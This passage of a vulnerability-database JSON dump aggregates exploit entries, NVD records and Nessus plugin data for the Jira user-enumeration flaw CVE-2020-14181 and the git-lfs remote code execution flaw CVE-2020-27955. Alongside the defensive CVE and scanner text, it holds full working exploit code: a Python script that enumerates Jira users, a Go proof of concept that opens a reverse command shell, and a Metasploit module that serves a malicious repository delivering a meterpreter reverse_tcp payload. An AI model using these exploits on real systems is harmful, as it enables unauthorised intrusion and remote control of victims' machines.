true, linemax: 150)\n end\nend\n", "sourceHref": "https://0day.today/exploit/36761", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-22T06:55:48", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-03-10T00:00:00", "type": "zdt", "title": "Atlassian JIRA 8.11.1 - User Enumeration Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181"], "modified": "2021-03-10T00:00:00", "id": "1337DAY-ID-35926", "href": "https://0day.today/exploit/description/35926", "sourceData": "# Title: Atlassian JIRA 8.11.1 - User Enumeration\r\n# Author: Dolev Farhi\r\n# Vulnerable versions: version < 7.13.16, 8.0.0 \u2264 version < 8.5.7, 8.6.0 \u2264 version < 8.12.0\r\n# CVE: CVE-2020-14181\r\n# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies.\r\n\r\nimport sys\r\nimport os\r\nimport requests\r\n\r\ndef help():\r\n print('python3 script.py <target> <usernames_file>')\r\n print('e.g. python3 script.py https://jiratarget.com usernames.txt')\r\n sys.exit()\r\n\r\nif len(sys.argv) < 3:\r\n help()\r\n\r\nserver = sys.argv[1]\r\nusernames = sys.argv[2]\r\n\r\nrandom_user = '0x00001'\r\n\r\ntry:\r\n os.path.exists(usernames)\r\nexcept:\r\n print(usernames, 'file does not exist.')\r\n sys.exit(1)\r\n\r\ndef test_vulnerable():\r\n resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))\r\n if 'User does not exist: {}'.format(random_user) in resp.text:\r\n return True\r\n return False\r\n\r\nif test_vulnerable is False:\r\n print('server is not vulnerable.')\r\n sys.exit(1)\r\n\r\nf = open(usernames, 'r').read()\r\n\r\nfor username in f.splitlines():\r\n resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))\r\n if 'User does not exist' not in resp.text:\r\n print('EXISTS', username)\n\n# 0day.today [2021-09-22] #", "sourceHref": "https://0day.today/exploit/35926", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-19T05:19:22", "description": "Proof of concept git-lfs remote code execution exploit written in Go. Affects Git, GitHub CLI, GitHub Desktop, Visual Studio, GitKraken, SmartGit, SourceTree, and more.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-08T00:00:00", "type": "zdt", "title": "git-lfs Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2020-11-08T00:00:00", "id": "1337DAY-ID-35186", "href": "https://0day.today/exploit/description/35186", "sourceData": "/*\n Go PoC exploit for git-lfs - Remote Code Execution (RCE)\nvulnerability CVE-2020-27955\n git-lfs-RCE-exploit-CVE-2020-27955.go\n\n Discovered by Dawid Golunski\n https://legalhackers.com\n https://exploitbox.io\n\n\n Affected (RCE exploit):\n Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken /\nSmartGit / SourceTree etc.\n Basically the whole Windows dev world which uses git.\n\n Usage:\n Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go\n Save & commit as git.exe\n\n The payload should get executed automatically on git clone operation.\n It spawns a reverse shell, or a calc.exe for testing (if it\ncouldn't connect).\n\n An lfs-enabled repository with lfs files may also be needed so that git-lfs\ngets invoked. This can be achieved with:\n\n git lfs track \"*.dat\"\n echo \"fat bug file\" > lfsdata.dat\n git add .*\n git add *\n git commmit -m 'git-lfs exploit' -a\n\n Check out the full advisory for details:\n\n https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html\n\n https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html\n\n PoC video at:\n https://youtu.be/tlptOf9w274\n\n ** For testing purposes only **\n\n\n*/\n\npackage main\nimport (\n \"net\"\n \"os/exec\"\n \"bufio\"\n \"syscall\"\n)\n\n\nfunc revsh(host string) {\n\n c, err := net.Dial(\"tcp\", host)\n if nil != err {\n // Conn failed\n if nil != c {\n c.Close()\n }\n // Calc for testing purposes if no listener available\n cmd := exec.Command(\"calc\")\n cmd.Run()\n return\n }\n\n r := bufio.NewReader(c)\n for {\n runcmd, err := r.ReadString('\\n')\n if nil != err {\n c.Close()\n return\n }\n cmd := exec.Command(\"cmd\", \"/C\", runcmd)\n cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}\n out, _ := cmd.CombinedOutput()\n c.Write(out)\n }\n}\n\n// Connect to netcat listener on local port 1337\nfunc main() {\n revsh(\"localhost:1337\")\n}\n\n\n-- \nRegards,\nDawid Golunski\n", "sourceHref": "https://0day.today/exploit/35186", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-11T23:55:56", "description": "This Metasploit modules exploits a critical vulnerability in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, which allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-17T00:00:00", "type": "zdt", "title": "Git git-lfs Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-17T00:00:00", "id": "1337DAY-ID-36763", "href": "https://0day.today/exploit/description/36763", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Git\n include Msf::Exploit::Git::Lfs\n include Msf::Exploit::Git::SmartHttp\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Git Remote Code Execution via git-lfs (CVE-2020-27955)',\n 'Description' => %q{\n A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for\n versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked\n into cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool\n },\n 'Author' => [\n 'Dawid Golunski ', # Discovery\n 'space-r7', # Guidance, git mixins\n 'jheysel-r7' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2020-27955'],\n ['URL', 'https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/']\n ],\n 'DisclosureDate' => '2020-11-04', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Git LFS <= 2.12',\n {\n 'Platform' => ['win']\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options([\n OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])\n ])\n deregister_options('RHOSTS')\n end\n\n def setup_repo_structure\n payload_fname = 'git.exe'\n @hook_payload = generate_payload_exe\n\n ptr_file = generate_pointer_file(@hook_payload)\n git_payload_ptr = GitObject.build_blob_object(ptr_file)\n\n git_attr_fname = '.gitattributes'\n git_attr_content = \"#{payload_fname} filter=lfs diff=lfs merge=lfs\"\n git_attr_obj = GitObject.build_blob_object(git_attr_content)\n\n register_dir_for_cleanup('.git')\n register_files_for_cleanup(git_attr_fname)\n\n # root of repository\n tree_ent =\n [\n {\n mode: '100644',\n file_name: git_attr_fname,\n sha1: git_attr_obj.sha1\n },\n {\n mode: '100755',\n file_name: payload_fname,\n sha1: git_payload_ptr.sha1\n }\n ]\n\n tree_obj = GitObject.build_tree_object(tree_ent)\n commit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)\n\n @git_objs =\n [\n commit, tree_obj, git_attr_obj, git_payload_ptr\n ]\n\n @refs =\n {\n 'HEAD' => 'refs/heads/master',\n 'refs/heads/master' => commit.sha1\n }\n end\n\n #\n # Determine whether or not the target is exploitable based on the User-Agent header returned from the client.\n # The git version must be equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0 to be\n # exploitable by this vulnerability.\n #\n # Returns +true+ if the target is suitable, else fail_with descriptive message\n #\n def target_suitable?(user_agent)\n info = fingerprint_user_agent(user_agent)\n if info[:ua_name] == Msf::HttpClients::UNKNOWN\n fail_with(Failure::NoTarget, \"The client's User-Agent string was unidentifiable: #{info}. The client needs to clone the malicious repo on windows with a git version less than 2.29.0\")\n end\n\n if info[:os_name] == 'Windows' &&\n ((info[:ua_name] == Msf::HttpClients::GIT && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.29.2')) ||\n (info[:ua_name] == Msf::HttpClients::GIT_LFS && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.12')))\n true\n else\n fail_with(Failure::NotVulnerable, \"The git client needs to be running on Windows with a version equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0. The user agent, #{info[:ua_name]}, found was running on, #{info[:os_name]} and was at version: #{info[:ua_ver]}\")\n end\n end\n\n def on_request_uri(cli, req)\n target_suitable?(req.headers['User-Agent'])\n if req.uri.include?('git-upload-pack')\n request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)\n case request.type\n when 'ref-discovery'\n response = send_refs(request)\n when 'upload-pack'\n response = send_requested_objs(request)\n else\n fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')\n end\n else\n response = handle_lfs_objects(req, @hook_payload, @git_addr)\n unless response.code == 200\n cli.send_response(response)\n fail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\\'s LFS request')\n end\n end\n cli.send_response(response)\n end\n\n def create_git_uri\n \"/#{Faker::App.name.downcase}.git\".gsub(' ', '-')\n end\n\n def primer\n @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']\n @git_addr = URI.parse(get_uri).merge(@git_repo_uri)\n print_status(\"Git repository to clone: #{@git_addr}\")\n hardcoded_uripath(@git_repo_uri)\n hardcoded_uripath(\"/#{Digest::SHA256.hexdigest(@hook_payload)}\")\n end\n\n def handle_lfs_objects(req, hook_payload, git_addr)\n git_hook_obj = GitObject.build_blob_object(hook_payload)\n\n case req.method\n when 'POST'\n print_status('Sending payload data...')\n response = get_batch_response(req, git_addr, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response\n when 'GET'\n print_status('Sending LFS object...')\n response = get_requested_obj_response(req, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response\n else\n fail_with(Failure::UnexpectedReply, 'Unable to handle client\\'s request')\n end\n\n response\n end\n\n def send_refs(req)\n fail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack'\n\n response = get_ref_discovery_response(req, @refs)\n fail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response\n\n response\n end\n\n def send_requested_objs(req)\n upload_pack_resp = get_upload_pack_response(req, @git_objs)\n unless upload_pack_resp\n fail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response')\n end\n\n upload_pack_resp\n end\n\n def exploit\n setup_repo_structure\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/36763", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-08-02T18:48:54", "description": "elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T17:15:00", "type": "cve", "title": "CVE-2021-32682", "cwe": ["CWE-22", "CWE-78", "CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2022-08-02T16:15:00", "cpe": [], "id": "CVE-2021-32682", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32682", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-25T21:49:44", "description": "Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-09-17T01:15:00", "type": "cve", "title": "CVE-2020-14181", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181"], "modified": "2022-03-25T18:14:00", "cpe": [], "id": "CVE-2020-14181", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14181", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T16:48:41", "description": "Git LFS 2.12.0 allows Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-05T15:15:00", "type": "cve", "title": "CVE-2020-27955", "cwe": ["CWE-427"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-12-16T20:35:00", "cpe": ["cpe:/a:git_large_file_storage_project:git_large_file_storage:2.12.0"], "id": "CVE-2020-27955", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27955", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:git_large_file_storage_project:git_large_file_storage:2.12.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-11T18:47:34", "description": "The Library File Manager WordPress plugin before 5.2.3 is using an outdated version of the elFinder library, which is know to be affected by security issues (CVE-2021-32682), and does not have any authorisation as well as CSRF checks in its connector AJAX action, allowing any authenticated users, such as subscriber to call it. Furthermore, as the options passed to the elFinder library does not restrict any file type, users with a role as low as subscriber can Create/Upload/Delete Arbitrary files and folders.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-04-04T16:15:00", "type": "cve", "title": "CVE-2022-0403", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682", "CVE-2022-0403"], "modified": "2022-04-11T16:16:00", "cpe": [], "id": "CVE-2022-0403", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0403", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T13:36:21", "description": "Git LFS is a command line extension for managing large files with Git. On Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems. This is the result of an incomplete fix for CVE-2020-27955. This issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator. Other than avoiding untrusted repositories or using a different operating system, there is no workaround. This is fixed in v2.13.2.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-15T18:15:00", "type": "cve", "title": "CVE-2021-21237", "cwe": ["CWE-426"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-01-29T22:18:00", "cpe": [], "id": "CVE-2021-21237", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21237", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "nessus": [{"lastseen": "2022-07-14T14:32:35", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 7.3.16, 8.x < 8.5.7 or 8.6.x < 8.12.0. It is, therefore, affected by an information disclosure vulnerability in the ViewUserHover.jspa endpoint allowing an unauthenticated user to enumerate users.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-02T00:00:00", "type": "nessus", "title": "Atlassian Jira 8.6.x < 8.12.0 Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14181"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112855", "href": "https://www.tenable.com/plugins/was/112855", "sourceData": "No source data", "cvss": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-14T14:32:32", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 7.3.16, 8.x < 8.5.7 or 8.6.x < 8.12.0. It is, therefore, affected by an information disclosure vulnerability in the ViewUserHover.jspa endpoint allowing an unauthenticated user to enumerate users.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-02T00:00:00", "type": "nessus", "title": "Atlassian Jira 8.x < 8.5.7 Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14181"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112854", "href": "https://www.tenable.com/plugins/was/112854", "sourceData": "No source data", "cvss": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-11T16:03:36", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 7.3.16, or is 8.x < 8.5.7, or 8.6.x < 8.12.0. It is, therefore, affected by an information disclosure vulnerability.\nAn unauthenticated, remote attacker can exploit this, via the /ViewUserHover.jspa endpoint, in order to enumerate users.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2020-09-24T00:00:00", "type": "nessus", "title": "Atlassian Jira < 7.13.16 / 8.x < 8.5.7 / 8.6.x < 8.12.0 User Enumeration (JRASERVER-71560)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14181"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:jira"], "id": "JIRA_8_12_0_JRASERVER-71560.NASL", "href": "https://www.tenable.com/plugins/nessus/140769", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140769);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2020-14181\");\n script_xref(name:\"IAVA\", value:\"2020-A-0432\");\n\n script_name(english:\"Atlassian Jira < 7.13.16 / 8.x < 8.5.7 / 8.6.x < 8.12.0 User Enumeration (JRASERVER-71560)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a web application that is affected by a user enumeration vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior\nto 7.3.16, or is 8.x < 8.5.7, or 8.6.x < 8.12.0. It is, therefore, affected by an information disclosure vulnerability.\nAn unauthenticated, remote attacker can exploit this, via the /ViewUserHover.jspa endpoint, in order to enumerate users.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/JRASERVER-71560\");\n # https://confluence.atlassian.com/jirasoftware/issues-resolved-in-7-13-16-1018767296.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a89d4437\");\n # https://confluence.atlassian.com/jirasoftware/issues-resolved-in-8-5-7-1018767308.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c982660\");\n # https://confluence.atlassian.com/jirasoftware/issues-resolved-in-8-12-0-1019380847.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f7758971\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Jira version 7.13.16, 8.5.7, 8.12.0 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14181\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:jira\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jira_detect.nasl\", 